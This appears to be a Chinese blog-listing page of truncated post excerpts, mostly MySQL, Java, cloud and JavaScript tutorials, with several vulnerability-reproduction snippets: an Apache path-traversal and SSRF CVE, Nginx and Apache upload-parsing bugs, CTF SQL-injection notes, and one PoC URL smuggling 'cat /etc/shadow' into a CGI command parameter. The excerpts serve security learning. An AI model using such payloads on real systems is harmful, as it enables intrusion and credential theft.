漏洞 基础json web

# MySQL-基础篇 ( 函数 + 约束 ) [TOC] ## 函数 - 是指一段可以直接被另一段程序调用的程序或代码 - 解决情况： - 表内存储的是入职日期，通过函数快速计算出入职天数 - 表内存储的是学生的分数值，通过函数快速判定分数属于不及格、及格还是优秀 ### 字符串函数 - MySQ ......

# MySQL-基础篇 ( 相关了解 + SQL-DDL ) [TOC] ## 认知了解 - 数据库，DataBase 简称 DB，是有组织的存储数据的仓库 - 数据库管理系统，DBMS，是操纵和管理数据库的大型软件 - SQL，全名 Structured Query Language，操作关系型数 ......

# MySQL-基础篇 ( 事务 ) [TOC] ## 事务简介 - 事务是一组操作的集合，它是一个不可分割的工作单位，事务会把所有的操作作为一个整体一起向系统提交或撤销操作请求，即这些操作要么同时成功，要么同时失败 - 典型案例：银行转账，一方转账减钱时，若是中途出了问题，此方的钱数不会减少，而是 ......

# MySQL-基础篇 ( 多表查询 ) [TOC] ## 多表查询 ### 分类 - 连接查询 - 内连接：相当于查询 A、B 交集部分数据 - 外连接： - 左外连接：查询左表所有数据，以及两张表交集部分数据 - 右外连接：查询右表所有数据，以及两张表交集部分数据 - 自连接：当前表与自身的连接 ......

# MySQL-基础篇 ( SQL-DML + DQL + DCL ) [TOC] ## SQL ### DML - 数据操作语言，用来对数据库表中的数据进行增删改 #### 添加数据 INSERT - 给指定字段添加数据 `INSERT INTO 表名(字段名1, 字段名2, ...) VALUE ......

描述 repr() 函数将对象转化为供解释器读取的形式。 语法 以下是 repr() 方法的语法: repr(object) 参数 object -- 对象。 返回值 返回一个对象的 string 格式。 实例 # coding=UTF-8 s="物品\t单价\t数量\n包子\t1\t2" prin ......

AWS 全球基础设施 选择区域 在为您的服务、数据和应用程序确定合适的区域时，需要考虑以下四项业务因素。 遵守数据治理和法律要求 根据您的公司和位置，您可能需要在特定区域运行数据。例如，如果您的公司需要所有数据都位于英国境内，您就需要选择伦敦区域。 有些公司不需要遵守特定于位置的数据法规，因此您可能 ......

安装IIS压缩功能后 点击 配置中选择 system.webServer/httpCompression 点击dynamicTypes 添加以下类型，Json和XML会压缩 ......

title: ctfshow web入门 信息搜集 date: 2023-08-11 17:21:10 categories: web刷题记录 description: web1~web17 # web1 f12查看源代码即可发现注释 # web2 js前台拦截，右键查看源代码和f12均失效,两种方 ......

title: ctfshow-web入门-sql注入-SELECT模块 date: 2023-08-13 22:06:17 categories: web刷题记录 description: web171~web172 ##基础知识缺乏的推荐看我的sqli-labs系列 ##web171 单引号包裹， ......

# 【狂神说Java】Java零基础学习笔记-JavaSE总结 ## JavaSE总结：  ## 🎉� ......

（一）DDL数据定义语言 作用：用于检索或修改数据 命令： SELECT：用于检索数据 INSERT：用于添加数据到数据库 UPDATE：用于修改数据库数据 DELETE：用于删除数据库数据 （二）DML数据操作语言 作用：用于定义数据结构，比如：创建、修改或删除数据库对象，包括：用于创建用户和重建 ......

# 【狂神说Java】Java零基础学习笔记-异常 ## 异常01：Error和Exception ### 什么是异常 - 实际工作中，遇到的情况不可能是非常完美的。比如:你写的某个模块，用户输入不一定符合你的要求、你的程序要打开某个文件，这个文件可能不存在或者文件格式不对，你要读取数据库的数据，数 ......

Native App和web App有什么区别,请看下图： Native App的优势： 1.提供最佳的用户体验，最优质的用户界面，最华丽的交互 2.针对不同平台提供不同体验 3.可节省带宽成本 4.可访问本地资源 5.盈利模式明朗 Native App的劣势： 1.移植到不同平台上比较麻烦 2.维 ......

云计算 云计算部署模式 选择云策略时，企业必须考虑所需的云应用程序组件、首选资源管理工具以及传统 IT 基础设施的要求等因素。 三种云计算部署模式分别是云端部署、本地部署和混合部署。 云端部署 在云中运行应用程序的所有组件。 将现有应用程序迁移到云。 在云中设计和构建新的应用程序。 在云端部署模式中 ......

〇、前言 在日常开发中，日期值当然是不可或缺的，能够清晰的在脑海中梳理出最快捷的实现也非常重要，那么今天就来汇总一下。 一、C# 中的本机时间以及格式化 如何取当前（本机）时间？很简单，一句话解决： DateTime dt_now = DateTime.Now; 1.1 单字母格式化日期时间值 如下 ......

### 1. json.load(json_data)与json.dump(python_data) json.load()用来将读取json文件，json.dump()用来将数据写入json文件 ### 2. json.loads()与json.dumps() - json.dumps 将 Pyt ......

原生js篇 1.js组成 ECMAscript BOM DOM 2.js输出内容的方式 1.弹窗alert() 2.网页输出document.write() 3.控制台输出console.log 3.什么是变量 存储临时数据的容器 4.定义变量有几种方式，区别 var 有变量提升，可以重复赋值; l ......

要使用Java SSH连接服务器并检查文件，可以使用JSch库。以下是一个示例代码： import com.jcraft.jsch.*; ​ import java.io.BufferedReader; import java.io.InputStream; import java.io.Input ......

# 文件系统 > Linux文件系统结构与Windows有些不同。Linux在文件系统的基础上没有物理驱动器（例如C：驱动器）， 而是使用逻辑文件系统。在文件系统结构的最顶层是/，它通常被称为文件系统的根，就好像它是一个倒置 树。请记住，这与 root 用户不同。这些术语起初可能看起来令人困惑，但是 ......

0x01 漏洞简介： Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。在Apache HTTPd 2.4.49版本中，存在一个 路径穿越漏洞。在配置了 Require all granted后，攻击者可利用路径穿越漏洞读取到Web目录之外的其他文件，比 如/etc/pas ......

页面是以下这个屌样 poc /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921 ......

0x01前言 用友NC Cloud大型企业数字化平台，深度应用新一代数字智能技术，完全基于云原生架构，打造开放、互联、融合、智能的一体化云平台，聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向，提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解 ......

当序列化Json时，有集合类型的属性的值为Null，则序列化后的json就有问题，不能通过asp.net core WebApi的校验 解决方法是： 只需要对集合默认初始化即可 ......

 显示预览编辑器 打开就能显示编辑前的和编辑后的了 觉得好了后，点应用才能应用到实际素材里面 ![imag ......

# Apache HTTP Server mod_proxy SSRF漏洞复现CVE-2021-40438 ## 漏洞利用 `利用条件:`apache v2.4.48及以下版本 `paylaod:可改-SSRF` ``` GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAA ......

# 【狂神说Java】Java零基础学习笔记-面向对象 ## 面向对象01：什么是面向对象 ### 面向过程&面向对象 - 面向过程思想 - 步骤清晰简单，第一步做什么，第二步做什么.... - 面对过程适合处理一些较为简单的问题 - 面向对象思想 - 物以类聚，**分类**的思维模式，思考问题首先 ......

# Nginx文件名逻辑漏洞复现CVE-2013-4547 ## 前置知识 本次针对的是中间件Nginx `Nginx是什么?` > Nginx（发音为“engine-x”）是一个高性能的开源Web服务器软件。它以异步事件驱动的方式处理客户端请求，具有占用资源 > 少、处理并发连接能力强和稳定性高等 ......

# Apache HTTPd换行解析漏洞复现CVE-2017-15715 ## 漏洞利用 `漏洞利用条件` > Apache: 2.4.0~2.4.29 > > 实际存到后端时的文件名可控 `漏洞利用方式` > bp中更改存放到后端的文件名 > > 假设 > > ``` > 原文件名为"evil.p ......

越来越多公司进行应用现代化，微服务化改造，容器化部署，而这一切皆绕不开“容器调度管理平台” Kubernetes。那么如何快速将云下自建Kubernetes迁移上云，及上云后如果按需备份恢复，及在必要时可以快速克隆生产环境进行开发测试成为众多客户的需求点，本文将通过简单场景示例来介绍如何通过Vele ......